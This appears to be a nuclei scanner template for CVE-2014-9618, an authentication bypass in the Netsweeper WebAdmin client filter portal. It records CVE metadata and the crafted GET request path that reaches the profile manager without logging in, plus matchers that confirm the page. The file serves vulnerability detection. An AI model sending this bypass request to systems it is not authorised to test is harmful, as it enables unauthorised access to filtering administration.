nuclei-templates/cves/2014/CVE-2014-9618.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

2021-12-06 16:38:54 +00:00
id: CVE-2014-9618
info:
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
author: daffainfo
severity: critical
2021-12-07 08:12:19 +00:00
description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-9618
cwe-id: CWE-287
2021-12-07 08:12:19 +00:00
tags: cve,cve2014,netsweeper,auth-bypass
2021-12-06 16:38:54 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
matchers-condition: and
matchers:
- type: word
2021-12-07 08:12:19 +00:00
part: body
2021-12-06 16:38:54 +00:00
words:
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- 'placeholder="Profile Manager">'
- '<title>Netsweeper WebAdmin</title>'
condition: and
- type: status
status:
2021-12-07 08:12:19 +00:00
- 200